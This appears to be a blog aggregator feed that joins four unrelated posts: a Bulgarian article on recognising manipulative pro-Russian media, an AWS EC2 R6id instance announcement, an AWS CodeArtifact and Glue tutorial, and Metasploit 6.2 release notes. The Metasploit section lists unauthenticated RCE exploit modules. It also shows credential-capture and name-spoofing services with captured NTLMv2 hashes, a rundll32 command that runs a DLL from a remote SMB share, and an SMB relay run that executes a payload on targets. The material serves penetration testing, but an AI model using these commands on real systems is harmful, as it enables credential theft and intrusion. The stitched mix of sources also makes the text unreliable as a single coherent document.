Political polarization feeds the idea that there is a media, academic, or institutional conspiracy hiding some truth from ordinary people. These tendencies are sustained by growing distrust in institutions, which is not entirely unfounded given a number of chronic problems. But manipulative information rarely offers better solutions; rather, it aims to exploit weaknesses, to incite and enrage, to frighten. Paradoxically, a large part of anti-COVID or anti-Ukrainian rhetoric is directed against organizations such as the WHO or the UN, yet that does not prevent them from being quoted selectively when they support particular theses. The result is that media and institutions are "honest" precisely when they criticize the West or support Russia, for example, but not when they criticize the Russian president. Such contradictions can be a red flag for the reader.

Selective quotation, withheld context, and fake authors

Although they dispute the legitimacy of the major media, disinformation sites try to resemble professional news organizations and often cite the reputable outlets they are supposedly an "alternative" to. An example is the site durjavnik.bg, which publishes pro-Russian and anti-Western content alongside other abridged reprints. The site relies on genuine information, which it republishes selectively and without context: from statements by Kadyrov and Putin to an interview with Kristina Spohr, a professor at the prestigious London School of Economics, quoted in a way that frames the invasion of Ukraine as resistance to a threat from the West rather than as a war for territorial and cultural dominance.

The articles on durjavnik.bg are signed by Georgi Aleksandrov, but the photograph next to his name is used on other sites under other names. At the same time, we find no record of a reporter by that name, apart from a Varna journalist who died two years ago. The Facebook page "Golata istina" ("The Naked Truth"), whose description reads "Durjavnik – the leading online news portal" and which shares articles from durjavnik.bg exclusively, is followed by more than 116,000 users (unlike the site's official Facebook page, which has under 7,000 followers). The main difference between durjavnik.bg and vsekidenbg.eu is that the former reprints real news without comment, while the latter leans more on distorted and selective interpretation. Both sites are popular in Facebook groups that until recently spread anti-vaccination content and are now sliding into pro-Russian content.

In such a situation, a reader can tell whether content is manipulative by paying attention to two factors: positions and the provision of context. If articles present only a one-sided position and systematically criticize some while praising others, it is probably malinformation or disinformation. Professional journalists cover specific problems and events, not particular sides.

The pro-Russian site pogled.info, for example, selectively quotes reputable foreign media such as The Guardian and The New York Times to support a piece that celebrates Russia's victory at Azovstal without mentioning the full context of the information. Pogled.info is yet another example of an "alternative" outlet that cites legitimate sources when convenient. The site used the same method when covering the pandemic. Such sites often quote articles critical of the West from reputable media, yet vilify the same media when they are critical of the Kremlin or take a different position on values.

We asked the readers of Toest

We also turned to our readers with the question of what they think manipulative content is. Their answers sum up the signs already described: misleading and emotional headlines; missing sources, dates, and authors; and language designed to influence readers and plant particular conclusions rather than letting them form their own opinion based on the facts.

"Extraordinary claims require extraordinary evidence," commented one reader. Another notices headlines that suggest whether a politician is bad or not on the basis of a single statement, with no added context or history, or radical headlines about price rises, for example, that fail to explain the economic and social factors contributing to those spikes.

Another reader points to the tactic of transcribing words and concepts from a particular language in a way that makes them sound foreign and frightening. "'Juvenile justice' ('yuvenalna yustitsiya') is a perfect example of something for which there is a plain Bulgarian term ('detsko pravosadie', children's justice). But transplanted that way, in the Russian manner, it sounds unfamiliar. And from there it is easy for the reader to draw the logical conclusion that someone from outside is trying to impose something alien on us," he says.

Infographics and cover illustration: © Iva Toshkova / Toest
In this series, Yoanna Elmi examines the topic of manipulative content in detail and answers five questions: what it is, and how, by whom, when, and why it is spread. The series is produced with the support of Science+, the international science journalism program of Free Press Unlimited and Free Press for Eastern Europe.

Source

New – Amazon EC2 R6id Instances with NVMe Local Instance Storage of up to 7.6 TB

Post Syndicated from Veliswa Boya original https://aws.amazon.com/blogs/aws/new-amazon-ec2-r6id-instances/

In November 2021, we launched the memory-optimized Amazon EC2 R6i instances, our sixth-generation x86-based offering powered by 3rd Generation Intel Xeon Scalable processors (code named Ice Lake).

Today I am excited to announce a disk variant of the R6i instance: the Amazon EC2 R6id instances with non-volatile memory express (NVMe) SSD local instance storage. The R6id instances are designed to power applications that require low storage latency or require temporary swap space.

Customers with workloads that require access to high-speed, low-latency storage, including those that need temporary storage for scratch space, temporary files, and caches, have the option to choose the R6id instances with NVMe local instance storage of up to 7.6 TB. The new instances are also available as bare-metal instances to support workloads that benefit from direct access to physical resources.

Here’s some background on what led to the development of the sixth-generation instances. Our customers who are currently using fifth-generation instances are looking for the following:

  • Higher Compute Performance – Higher CPU performance to improve latency and processing time for their workloads
  • Improved Price Performance – Customers are very sensitive to price performance to optimize costs
  • Larger Sizes – Customers require larger sizes to scale their enterprise databases
  • Higher Amazon EBS Performance – Customers have requested higher Amazon EBS throughput (“at least double”) to improve response times for their analytics applications
  • Local Storage – Large customers have expressed a need for more local storage per vCPU

Sixth-generation instances address these requirements by offering generational improvements across the board, including a 15 percent increase in price performance, 33 percent more vCPUs, up to 1 TB of memory, 2x networking performance, 2x EBS performance, and global availability.

Compared to R5d instances, the R6id instances offer:

  • A larger instance size (r6id.32xlarge) with 128 vCPUs and 1,024 GiB of memory, enabling customers to consolidate their workloads and scale up applications.
  • Up to 15 percent improvement in compute price performance and 20 percent higher memory bandwidth.
  • Up to 58 percent higher storage per vCPU and 34 percent lower cost per TB.
  • Up to 50 Gbps network bandwidth and up to 40 Gbps EBS bandwidth; EBS burst bandwidth support for sizes up to r6id.4xlarge.
  • Always-on memory encryption.
  • Support for new Intel Advanced Vector Extensions (AVX-512) instructions such as VAES, VCLMUL, VPCLMULQDQ, and GFNI for faster execution of cryptographic algorithms such as those used in IPSec and TLS implementations (a quick way to check for these flags is sketched below).
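
If you want to confirm that these instruction-set extensions are visible to your operating system on an R6id instance, one quick, illustrative check on Linux is to grep the CPU flags:

# Look for the AVX-512, VAES, VPCLMULQDQ, and GFNI feature flags exposed by the CPU
grep -m1 -o 'avx512[a-z]*\|vaes\|vpclmulqdq\|gfni' /proc/cpuinfo | sort -u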

The detailed specifications of the R6id instances are as follows:

Instance Name   vCPUs   RAM (GiB)   Local NVMe SSD Storage (GB)   EBS Throughput (Gbps)   Network Bandwidth (Gbps)
r6id.large      2       16          1 x 118                       Up to 10                Up to 12.5
r6id.xlarge     4       32          1 x 237                       Up to 10                Up to 12.5
r6id.2xlarge    8       64          1 x 474                       Up to 10                Up to 12.5
r6id.4xlarge    16      128         1 x 950                       Up to 10                Up to 12.5
r6id.8xlarge    32      256         1 x 1900                      10                      12.5
r6id.12xlarge   48      384         2 x 1425                      15                      18.75
r6id.16xlarge   64      512         2 x 1900                      20                      25
r6id.24xlarge   96      768         4 x 1425                      30                      37.5
r6id.32xlarge   128     1024        4 x 1900                      40                      50
r6id.metal      128     1024        4 x 1900                      40                      50
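
As a quick, hedged illustration of using the local NVMe storage (the AMI, key pair, and security group IDs below are placeholders, and the device name can differ by instance size and driver), you might launch an instance and mount the instance-store volume like this:

# Launch an r6id.xlarge (placeholder AMI, key pair, and security group IDs)
aws ec2 run-instances \
  --image-id ami-0123456789abcdef0 \
  --instance-type r6id.xlarge \
  --key-name my-key \
  --security-group-ids sg-0123456789abcdef0

# On the instance: format and mount the local NVMe instance-store volume
lsblk                                   # confirm which device is the instance store (often /dev/nvme1n1)
sudo mkfs -t xfs /dev/nvme1n1
sudo mkdir -p /scratch
sudo mount /dev/nvme1n1 /scratch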

Now available

The R6id instances are available today in the AWS US East (Ohio), US East (N. Virginia), US West (Oregon), and Europe (Ireland) Regions as On-Demand, Spot, and Reserved Instances or as part of a Savings Plan. As usual with EC2, you pay for what you use. For more information, see the Amazon EC2 pricing page.

To learn more, visit our Amazon EC2 R6i instances page, and please send feedback to AWS re:Post for EC2 or through your usual AWS Support contacts.

Veliswa x

Simplify and optimize Python package management for AWS Glue PySpark jobs with AWS CodeArtifact

Post Syndicated from Ashok Padmanabhan original https://aws.amazon.com/blogs/big-data/simplify-and-optimize-python-package-management-for-aws-glue-pyspark-jobs-with-aws-codeartifact/

Data engineers use various Python packages to meet their data processing requirements while building data pipelines with AWS Glue PySpark jobs. Languages like Python and Scala are commonly used in data pipeline development. Developers can take advantage of open-source packages, or even customize their own, to make it easier and faster to implement use cases such as data manipulation and analysis. However, managing standardized packages can be cumbersome when multiple teams use different versions of packages or install non-approved packages, causing duplicate development effort due to the lack of visibility into what is available at the enterprise level. This can be especially challenging in large enterprises with multiple data engineering teams.

ETL developers often need additional packages for their AWS Glue ETL jobs. With security being job zero for customers, many restrict egress traffic from their VPC to the public internet, and they need a way to manage the packages used by applications, including their data processing pipelines.

Our proposed solution enables customers with network egress restrictions to manage packages centrally with AWS CodeArtifact and use their favorite libraries in their AWS Glue ETL PySpark code. In this post, we’ll describe how CodeArtifact can be used for managing packages and modules for AWS Glue ETL jobs, and we’ll demo a solution using Glue PySpark jobs that run within VPC subnets that have no internet access.

Solution overview

The solution uses CodeArtifact as a tool to make it easier for organizations of any size to securely store, publish, and share the software packages used in their ETL jobs with AWS Glue. VPC endpoints for CodeArtifact and AWS Glue provide private connectivity over AWS PrivateLink. AWS Step Functions makes it easy to coordinate the orchestration of components used in the data processing pipeline. Native integrations with both CodeArtifact and AWS Glue enable the workflow to both authenticate the request to CodeArtifact and start the AWS Glue ETL job.
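
As a rough illustration of the underlying idea (not the exact commands used by the CDK stack in this post; the domain, repository, account ID, Region, job name, and package versions below are placeholders), a Glue job can be pointed at a CodeArtifact repository through pip's index URL via the job's --additional-python-modules and --python-modules-installer-option parameters:

# Obtain a temporary CodeArtifact authorization token (placeholder domain and account values)
export CODEARTIFACT_TOKEN=$(aws codeartifact get-authorization-token \
  --domain my-domain --domain-owner 111122223333 \
  --query authorizationToken --output text)

# Build a pip index URL that points at the CodeArtifact repository's PyPI endpoint
export INDEX_URL="https://aws:${CODEARTIFACT_TOKEN}@my-domain-111122223333.d.codeartifact.us-east-1.amazonaws.com/pypi/my-repo/simple/"

# Start a Glue job that installs extra packages from that private index
aws glue start-job-run --job-name my-glue-job \
  --arguments "{\"--additional-python-modules\": \"custom-lib==0.1.0,boto3==1.24.70\", \"--python-modules-installer-option\": \"--index-url=${INDEX_URL}\"}"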

The following architecture shows an implementation of a solution using AWS Glue, CodeArtifact, and Step Functions to use additional Python modules without egress internet access. The solution is deployed using AWS Cloud Development Kit (AWS CDK), an open-source software development framework to define your cloud application resources using familiar programming languages.

Fig 1: Architecture Diagram for the Solution
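
To make the AWS CDK piece more concrete, here is a minimal, hypothetical Python sketch of the network portion of such a stack: a VPC with only an isolated private subnet, plus the gateway and interface endpoints the Glue job needs to reach Amazon S3 and CodeArtifact privately. The construct IDs and endpoint wiring are illustrative assumptions, not the code from the repository.

from aws_cdk import Stack, aws_ec2 as ec2
from constructs import Construct

class EnterpriseRepoNetworkStack(Stack):
    # Illustrative only: a VPC with an isolated subnet and the VPC endpoints
    # the Glue job needs to reach Amazon S3 and CodeArtifact without internet access.
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        # Isolated subnets only -- no internet gateway or NAT gateway is created.
        vpc = ec2.Vpc(
            self, "EnterpriseRepoVpc",
            subnet_configuration=[
                ec2.SubnetConfiguration(
                    name="Enterprise-Repo-Private",
                    subnet_type=ec2.SubnetType.PRIVATE_ISOLATED,
                )
            ],
        )

        # Gateway endpoint so the job can read and write S3 privately.
        vpc.add_gateway_endpoint("S3Endpoint", service=ec2.GatewayVpcEndpointAwsService.S3)

        # Interface endpoints for CodeArtifact API calls and repository (pip) traffic.
        vpc.add_interface_endpoint(
            "CodeArtifactApi",
            service=ec2.InterfaceVpcEndpointAwsService("codeartifact.api"),
        )
        vpc.add_interface_endpoint(
            "CodeArtifactRepositories",
            service=ec2.InterfaceVpcEndpointAwsService("codeartifact.repositories"),
        )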

To illustrate how to set up this architecture, we’ll walk you through the following steps:

  1. Deploying an AWS CDK stack to provision the following AWS resources:
    1. CodeArtifact
    2. An AWS Glue job
    3. Step Functions workflow
    4. Amazon Simple Storage Service (Amazon S3) bucket
    5. A VPC with a private subnet and VPC endpoints to Amazon S3 and CodeArtifact
  2. Validating the deployment.
  3. Running a sample workflow – This workflow runs an AWS Glue PySpark job that uses a custom Python library and an upgraded version of boto3.
  4. Cleaning up your resources.

Prerequisites

Make sure that you complete the following steps as prerequisites:

The solution

Launching your AWS CDK Stack

Step 1: Using your device’s command line, clone our Git repository to a local directory on your device:

git clone https://github.com/aws-samples/python-lib-management-without-internet-for-aws-glue-in-private-subnets.git

Step 2: Change directories to the Amazon S3 scripts location in the newly cloned repository:

cd python-lib-management-without-internet-for-aws-glue-in-private-subnets/scripts/s3

Step 3: Download the following CSV, which contains New York City Taxi and Limousine Commission (TLC) weekly trip data. This will serve as the input source for the AWS Glue job:

aws s3 cp s3://nyc-tlc/misc/FOIL_weekly_trips_apps.csv .

Step 4: Change directories to the path where the app.py file is located (relative to the previous step, run the following):

cd ../..

Step 5: Create a virtual environment:

macOS/Linux:
python3 -m venv .env

Windows:
python -m venv .env

Step 6: Activate the virtual environment after the init process completes and the virtual environment is created:

macOS/Linux:
source .env/bin/activate

Windows:
.env\Scripts\activate.bat

Step 7: Install the required dependencies:

pip3 install -r requirements.txt

Step 8: Make sure that your AWS profile is set up, along with the Region that you want to deploy to, as mentioned in the prerequisites. Synthesize the templates. AWS CDK apps use code to define the infrastructure, and when run they produce, or “synthesize,” a CloudFormation template for each stack defined in the application:

cdk synthesize

Step 9: Bootstrap the AWS CDK app using the following command:

cdk bootstrap aws://<AWS_ACCOUNTID>/<AWS_REGION>

Replace the placeholders AWS_ACCOUNTID and AWS_REGION with your AWS account ID and the Region to deploy to.

This step provisions the initial resources, including an Amazon S3 bucket for storing files and IAM roles that grant permissions needed to perform deployments.

Step 10: Deploy the solution. By default, some actions that could potentially make security changes require approval. In this deployment, you’re creating an IAM role. The following command overrides the approval prompts, but if you would like to manually accept the prompts, then omit the --require-approval never flag:

cdk deploy "*" --require-approval never

While the AWS CDK deploys the CloudFormation stacks, you can follow the deployment progress in your terminal:

Fig 2: AWS CDK Deployment progress in terminal

Once the deployment is successful, you’ll see the successful status as follows:

Fig 3: AWS CDK Deployment completion success

Step 11: Log in to the AWS Console, go to CloudFormation, and see the output of the ApplicationStack stack:

Fig 4: AWS CloudFormation stack output

Note the values of the DomainName and RepositoryName variables. We’ll use them in the next step to upload our artifacts.

Step 12: We will upload a custom library into the repo that we created. This will be used by our Glue ETL job.

  • Install twine using pip:
python3 -m pip install twine

The custom Python package glueutils-0.2.0.tar.gz can be found under this folder of the cloned repo:

cd scripts/custom_glue_library
  • Configure twine with the login command (additional details here). Refer to Step 11 for the DomainName and RepositoryName values from the CloudFormation output:
aws codeartifact login --tool twine --domain <DomainName> --domain-owner <AWS_ACCOUNTID> --repository <RepositoryName>
  • Publish Python package assets:
twine upload --repository codeartifact glueutils-0.2.0.tar.gz
Fig 5: Python package publishing using twine

Validate the Deployment

The AWS CDK stack will deploy the following AWS resources:

  1. Amazon Virtual Private Cloud (Amazon VPC)
    1. One Private Subnet
  2. AWS CodeArtifact
    1. CodeArtifact Repository
    2. CodeArtifact Domain
    3. CodeArtifact Upstream Repository
  3. AWS Glue
    1. AWS Glue Job
    2. AWS Glue Database
    3. AWS Glue Connection
  4. AWS Step Functions workflow
  5. Amazon S3 buckets for AWS CDK and for storing scripts and the CSV file
  6. IAM Roles and Policies
  7. Amazon Elastic Compute Cloud (Amazon EC2) Security Group

Step 1: In the AWS Console, browse to the AWS account and Region to which the resources are deployed.

Step 2: Browse to the Subnets page (https://<region>.console.aws.amazon.com/vpc/home?region=<region>#subnets:). (Replace region with the AWS Region to which your resources are deployed.)

Step 3: Select the subnet named ApplicationStack/enterprise-repo-vpc/Enterprise-Repo-Private-Subnet1.

Step 4: Select the route table and validate that there are no routes to the internet through an internet gateway or NAT gateway, and that it’s similar to the following image:

Fig 6: Route table validation

Step 5: Navigate to the CodeArtifact console and review the repositories created. The enterprise-repo is your local repository, and pypi-store is the upstream repository connected to PyPI, providing artifacts from pypi.org.

Fig 7: AWS CodeArtifact repositories created

Step 6: Navigate to enterprise-repo and search for glueutils. This is the custom Python package that we published.

Fig 8: AWS CodeArtifact custom Python package published

Step 7: Navigate to Step Functions Console and review the enterprise-repo-step-function as follows:

Fig 9: AWS Step Functions workflow

The diagram shows how the Step Functions workflow will orchestrate the pattern.

  1. The first step, CodeArtifactGetAuthorizationToken, calls the getAuthorizationToken API to generate a temporary authorization token for accessing repositories in the domain (this token is valid for 15 minutes).
  2. The next step, GenerateCodeArtifactURL, takes the authorization token from the response and generates the CodeArtifact URL.
  3. Then the workflow moves into the GlueStartJobRun state, which makes a synchronous API call to run the AWS Glue job. A boto3 sketch of the same pattern follows below.
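
For readers who prefer to see the same pattern outside of Step Functions, the following boto3 sketch approximates what the workflow does. The domain, account, repository, and job names are placeholders, and you should verify the pip index URL format against your own CodeArtifact repository endpoint; in the deployed solution, these values come from the CDK stack and the workflow itself.

import boto3

REGION = "us-east-1"                                                  # placeholder
DOMAIN, DOMAIN_OWNER = "enterprise", "111122223333"                   # placeholders
REPOSITORY, GLUE_JOB = "enterprise-repo", "enterprise-repo-glue-job"  # placeholders

codeartifact = boto3.client("codeartifact", region_name=REGION)
glue = boto3.client("glue", region_name=REGION)

# 1. Request a temporary authorization token for the domain (15 minutes here).
token = codeartifact.get_authorization_token(
    domain=DOMAIN, domainOwner=DOMAIN_OWNER, durationSeconds=900
)["authorizationToken"]

# 2. Build the pip index URL for the private CodeArtifact repository.
index_url = (
    f"https://aws:{token}@{DOMAIN}-{DOMAIN_OWNER}.d.codeartifact."
    f"{REGION}.amazonaws.com/pypi/{REPOSITORY}/simple/"
)

# 3. Start the Glue job, pointing pip at the private repository.
run = glue.start_job_run(
    JobName=GLUE_JOB,
    Arguments={
        "--additional-python-modules": "boto3,glueutils==0.2.0",
        "--python-modules-installer-option": f"--index-url {index_url}",
    },
)
print(run["JobRunId"])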

Step 8: Navigate to the AWS Glue Console and select the Jobs tab, then select enterprise-repo-glue-job.

The AWS Glue job is created with the following script and AWS Glue Connection enterprise-repo-glue-connection. The AWS Glue connection is a Data Catalog object that enables the job to connect to sources and APIs from within the VPC. The network type connection runs the job from within the private subnet to make requests to Amazon S3 and CodeArtifact over the VPC endpoint connection. This enables the job to run without any traffic through the internet.

Note the connections section in the AWS Glue PySpark job, which makes the Glue job run in the private subnet of the provisioned VPC.

Fig 10: AWS Glue network connections
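
As a rough illustration of how a network-type connection like this could be defined with boto3 (in this post it is provisioned by the AWS CDK stack; the subnet, security group, and Availability Zone values below are placeholders):

import boto3

glue = boto3.client("glue", region_name="us-east-1")  # placeholder Region

# A NETWORK connection pins the job's elastic network interfaces to a specific
# subnet and security group, so all job traffic stays inside the VPC.
glue.create_connection(
    ConnectionInput={
        "Name": "enterprise-repo-glue-connection",
        "ConnectionType": "NETWORK",
        "ConnectionProperties": {},
        "PhysicalConnectionRequirements": {
            "SubnetId": "subnet-0123456789abcdef0",           # placeholder
            "SecurityGroupIdList": ["sg-0123456789abcdef0"],  # placeholder
            "AvailabilityZone": "us-east-1a",                 # placeholder
        },
    }
)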

The job takes an Amazon S3 bucket, Glue Database, Python Job Installer Option, and Additional Python Modules as job parameters. The parameters --additional-python-modules and --python-modules-installer-option are passed to install the selected Python module from a PyPI repository hosted in AWS CodeArtifact.

The script itself first reads the taxi data in CSV format from the Amazon S3 input path. A light transformation sums the total trips by year, week, and app. The output is then written to an Amazon S3 path as Parquet, and a partitioned table in the AWS Glue Data Catalog is either created or, if it already exists, updated.

You can find the Glue PySpark script here.
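
For orientation, here is a hedged, standalone PySpark sketch of that transformation. The paths and source column names are placeholders, and the repository script linked above remains the authoritative version (it also handles the Data Catalog table creation).

from pyspark.sql import SparkSession
from pyspark.sql import functions as F

spark = SparkSession.builder.appName("taxi-weekly-trips").getOrCreate()

# Placeholder S3 paths -- the real job receives these as job arguments.
input_path = "s3://<bucket>/input/FOIL_weekly_trips_apps.csv"
output_path = "s3://<bucket>/output/taxidataparquet/"

# Read the TLC weekly trips CSV.
trips = spark.read.option("header", True).option("inferSchema", True).csv(input_path)

# Light transformation: total trips by year, week, and app.
summary = (
    trips.groupBy("year", "week", "app")              # output columns match the Athena query below
         .agg(F.sum("trips").alias("total_trips"))    # "trips" is a placeholder source column
)

# Write Parquet partitioned by year, backing the Glue Data Catalog table.
summary.write.mode("overwrite").partitionBy("year").parquet(output_path)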

Run a sample workflow

The following steps will demonstrate how to run a sample workflow:

Step 1: Navigate to the Step Functions Console and select the enterprise-repo-step-function.

Step 2: Select Start execution and enter the following input. We’re including the glueutils and latest boto3 libraries as part of the job run. It is always recommended to pin your Python dependencies to avoid breaking changes from a future version of a dependency. In the example below, the latest available version of boto3 and version 0.2.0 of glueutils will be installed. To pin boto3 to a specific release, you can specify, for example, boto3==1.24.2 (the latest release at the time of publishing this post).

{"pythonmodules": "boto3,glueutils==0.2.0"}

Step 3: Select Start execution and wait until Execution Status is Succeeded. This may take a few minutes.

Step 4: Navigate to the CodeArtifact Console to review the enterprise-repo repository. You’ll see the cached PyPI packages and all of their dependencies pulled down from PyPI.

Step 5: In the Glue Console under the Runs section of the enterprise-glue-job, you’ll see the parameters passed:

Fig 11: AWS Glue job execution history

Note the --index-url value that was passed as a parameter to the Glue ETL job. The token it contains is valid for only 15 minutes.

Step 6: Navigate to the Amazon CloudWatch Console and go to the /aws/glue-jobs log group to verify that the packages were installed from the local repo.

You will see that the two package names passed as parameters are installed with the corresponding versions.

Fig 12: Amazon CloudWatch logs details for the Glue job

Step 7: Navigate to the Amazon Athena console and select Query Editor.

Step 8: Run the following query to validate the output of the AWS Glue job:

SELECT year, app, SUM(total_trips) as sum_of_total_trips 
FROM 
"codeartifactblog_glue_db"."taxidataparquet" 
GROUP BY year, app;

Clean up

Make sure that you clean up all of the other AWS resources that you created in the AWS CDK stack deployment. You can delete these resources via the cdk destroy command, as follows, or through the CloudFormation console.

To destroy the resources using AWS CDK, follow these steps:

  1. Follow Steps 1-6 from the ‘Launching your AWS CDK Stack’ section.
  2. Destroy the app by executing the following command:
    cdk destroy

Conclusion

In this post, we demonstrated how CodeArtifact can be used for managing Python packages and modules for AWS Glue jobs that run within VPC subnets that have no internet access. We also demonstrated how the versions of existing packages (for example, boto3) can be updated, and how a custom Python library (glueutils) developed locally can be managed through CodeArtifact.

This post enables you to use your favorite Python packages with AWS Glue ETL PySpark jobs by modifying the input to the AWS Step Functions workflow (Step 2 in the Run a sample workflow section).


About the Authors

Bret Pontillo is a Data & ML Engineer with AWS Professional Services. He works closely with enterprise customers building data lakes and analytical applications on the AWS platform. In his free time, Bret enjoys traveling, watching sports, and trying new restaurants.

Gaurav Gundal is a DevOps consultant with AWS Professional Services, helping customers build solutions on the AWS platform. When not building, designing, or developing solutions, Gaurav spends time with his family, plays guitar, and enjoys traveling to different places.

Ashok Padmanabhan is a Sr. IOT Data Architect with AWS Professional Services, helping customers build data and analytics platform and solutions. When not helping customers build and design data lakes, Ashok enjoys spending time at the beach near his home in Florida.

Announcing Metasploit 6.2

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/

Announcing Metasploit 6.2

Metasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Between Metasploit 6.1.0 (August 2021) and the latest Metasploit 6.2.0 release, we’ve added:

  • 138 new modules
  • 148 enhancements and features
  • 156 bug fixes

Top modules

Each week, the Metasploit team publishes a Metasploit wrap-up with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).

Remote Exploitation

  • VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits CVE-2021-44228: A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as root / SYSTEM. This exploit has been tested on both Windows and Linux targets.
  • F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388: This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
  • VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954: This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.
  • Zyxel Firewall ZTP Unauthenticated Command Injection by jbaines-r7, which exploits CVE-2022-30525: This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the nobody user. The vulnerability was discovered by Rapid7 researcher Jake Baines.

Local Privilege Escalation

Capture plugin

Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the auxiliary/server/capture namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, a new capture plugin can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.

After running the load capture command, the captureg command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.

In the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:

msf6 > load capture
[*] Successfully loaded plugin: Credential Capture
msf6 > captureg start --ip 192.168.123.128
Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt
Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339
[+] Authentication Capture: DRDA (DB2, Informix, Derby) started
[+] Authentication Capture: FTP started
[+] HTTP Client MS Credential Catcher started
[+] HTTP Client MS Credential Catcher started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: MSSQL started
[+] Authentication Capture: MySQL started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: PostgreSQL started
[+] Printjob Capture Service started
[+] Authentication Capture: SIP started
[+] Authentication Capture: SMB started
[+] Authentication Capture: SMTP started
[+] Authentication Capture: Telnet started
[+] Authentication Capture: VNC started
[+] Authentication Capture: FTP started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: SMTP started
[+] NetBIOS Name Service Spoofer started
[+] LLMNR Spoofer started
[+] mDNS Spoofer started
[+] Started capture jobs

Opening a new terminal in conjunction with the tail command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:

$ tail -f  ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.123.136
[SMB] NTLMv2-SSP Username   : EXAMPLE\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000

It is also possible to log directly to stdout without using the tail command:

captureg start --ip 192.168.123.128 --stdout

SMB v3 server support

This work builds upon the SMB v3 client support added in Metasploit 6.0.

Metasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.

Example usage:

ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point

This can be useful for copying files onto remote targets, or for running remote DLLs:

copy \\192.168.123.1\home\example.txt .
rundll32.exe \\192.168.123.1\home\example.dll,0

All remaining Metasploit modules have now been updated to support SMB v3. Some examples:

  • exploit/windows/smb/smb_delivery: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as rundll32.exe \\192.168.123.128\tHKPx\WeHnu,0
  • exploit/windows/smb/capture: This module creates a mock SMB server that accepts credentials before returning NT_STATUS_LOGON_FAILURE. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking
  • exploit/windows/dcerpc/cve_2021_1675_printnightmare: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.
  • exploit/windows/smb/smb_relay: Covered in more detail below.

Enhanced SMB relay support

The windows/smb/smb_relay module has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.

Example module usage:

use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run

Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:

msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client     : 192.168.123.4
[SMB] NTLMv2-SSP Username   : \admin
[SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
